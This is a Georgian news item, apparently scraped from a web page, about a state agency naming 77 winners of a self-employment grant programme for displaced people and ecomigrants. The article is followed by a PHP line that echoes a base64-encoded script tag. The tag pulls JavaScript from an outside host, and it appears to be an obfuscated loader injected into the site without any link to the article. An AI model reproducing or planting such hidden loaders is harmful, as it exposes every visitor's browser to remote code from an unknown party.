celsiusi
ავერსი საქკაბელი

დევნილთა, ეკომიგრანტთა და საარსებო წყაროებით უზრუნველყოფის სააგენტოს საგრანტო პროგრამის მიზანს იძულებით გადაადგილებული პირების პროფესიული საქმიანობის მხარდაჭერა და მათთვის შემოსავლის წყაროს გაჩენა წარმოადგენს.

დევნილებმა და ეკომიგრანტებმა სახელობო იარაღები, რაც მათ საქმიანობის წამოწყებასა თუ გაფართოებაში დაეხმარებათ თავადვე შეარჩიეს. ამ ეტაპზე, კომისიამ, წინასწარ განსაზღვრული კრიტერიუმების შესაბამისად, 77 გამარჯვებული გამოავლინა.

პროგრამაში ჩართვა პროფესიული სასწავლებლების კურსდამთავრებულ იძულებით გადაადგილებულ პირებს და იმ დევნილებსა და ეკომიგრანტებს შეუძლიათ, რომელთა პროფესიული საქმიანობა რაიმე სახის დოკუმენტით დასტურდება. პროგრამის ფარგლებში, განაცხადების მიღება ყოველწლიურად ცხადდება.

თვითდასაქმების საგრანტო პროგრამის გამარჯვებულთა სია დევნილთა, ეკომიგრანტთა და საარსებო წყაროებით უზრუნველყოფის სააგენტოს ვებ-გვერდზე - https://idp.gov.ge/statement-119/  გამოქვეყნდა.

376
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");